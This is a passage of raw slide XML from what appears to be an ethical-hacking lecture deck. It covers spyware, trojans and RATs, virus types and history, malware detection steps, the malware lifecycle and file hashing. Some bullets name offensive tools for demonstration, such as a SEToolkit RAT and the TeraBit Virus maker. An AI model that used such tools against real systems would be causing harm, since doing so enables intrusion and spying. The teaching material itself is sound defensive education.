              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Scareware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Spyware</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81" name="Google Shape;381;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4004200" y="5584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nsolas"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Spys on user by reporting and recording</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Most of the time it is Majjani software</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Works on phones too</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can hide data in a file and send it out</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Look at spytech-web.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>You can mix up characters by copy pasting, deleting, … if you want to confuse keyloggers!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64"/>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Trojan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87" name="Google Shape;387;p64"/>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Consolas"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wrapping malware with legitimate app (binding)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RAT (remote access trojan) can hide or covert on HTTP, VNC, ICMP, HTTPS, … (page 349); say HTTP RAT but be careful where you download &amp; check md5s</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Firewalls will let outbound traffic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>They sometimes use DynamicDNS to keep access in long term</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Botnets, Proxy Trojans, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Show a sample RAT from SEToolkit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Look at page 344</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6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Viruses 1/2</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93" name="Google Shape;393;p65"/>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Consolas"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Self distributed (infects)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sometimes transforms to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>stay hidden</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Melissa virus infected 20% of the computers at the time! Used email to spread</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Anti viruses identify viruses in wild and add their signatures to their DBs. But newer anti virus softwares are also checking the behaviour of the apps to identify viruses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Why? Financial ( say ransomware), Anti virus companies, finding data on other computers, learning, pranks, hacktivists, ..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Types: system/boot sector, file viruses, multipartite (infect both MBR &amp; files), Macro viruses, Stealth/tunneling (they can hand over original file to the antiviruses!), encryption, polymoprphic, Metamorphic (reprogram itself!), cavity virus (overwrite), Sparse (not every time, every n times or on specific dates), shell,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اینفوسک</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>اصطلاح ها</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088600" y="576900"/>
            <a:ext cx="4537500" cy="38607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حمله ها: دسترسی و برداشتن، تغییر دادن، مختلف کردن</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>مثلث Functionality, Security, Usability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>مثلث Confidentiality, Integrity, Availability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Authenticity related to integrity</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Non Repudiation (We know who did what)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6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Viruses 2/2</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399" name="Google Shape;399;p66"/>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TeraBit Virus maker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Avoid Opening Calculator</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We can browse for another file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67"/>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Malware detection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05" name="Google Shape;405;p67"/>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Star with an updated anti virus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Check below and search for unknowns</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ports (netstat -a -n , tcpview, currports, ...)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Processes (process monitor)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Registry Entries (is huge! So you will need tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>jv16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, regscanner)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Device Drivers (msinfo can show drivers or even hide all MS ones (from view))</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Services (msinfo, service manager)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Startup Apps (can start from different places so you can go with this tool: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>security autorun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Files and folders (tools like SFC, SIGVERIF &amp; FCIV will save and check hashes. Also there is 3rd party tripwire. sfc /?)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Network Activities. This happens a lot when you are compromised. Specially if protocol is used unusually (say repeated ICMP with PacketID 0). We will see this more on sniffing.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68"/>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Malware lifecycle</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11" name="Google Shape;411;p68"/>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Design</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Replication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Launch</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Detection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Incorporation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Elimination</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="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rPr lang="en"/>
              <a:t>1970s first viruses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>1982 first virus via floppy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>1986 first PC virus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>1987 First logic bomb: Jerusalem worked on Friday 13th</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>1989 First Multipartite: Ghostball</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>1992 First Polymorphic: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Metamorphic: rewrites itself on each run</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HOAX is not a virus!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9"/>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File Verification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17" name="Google Shape;417;p69"/>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Hashing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DNS spoofing / DNS Cache poisoning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Most download sites will provide the hashes on downloaded files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hash will create a digest</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>One way</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Collision is difficult</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Types: md5, sha, ..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7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Analyzing Malware</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23" name="Google Shape;423;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088600" y="2724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Do it on LAB!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
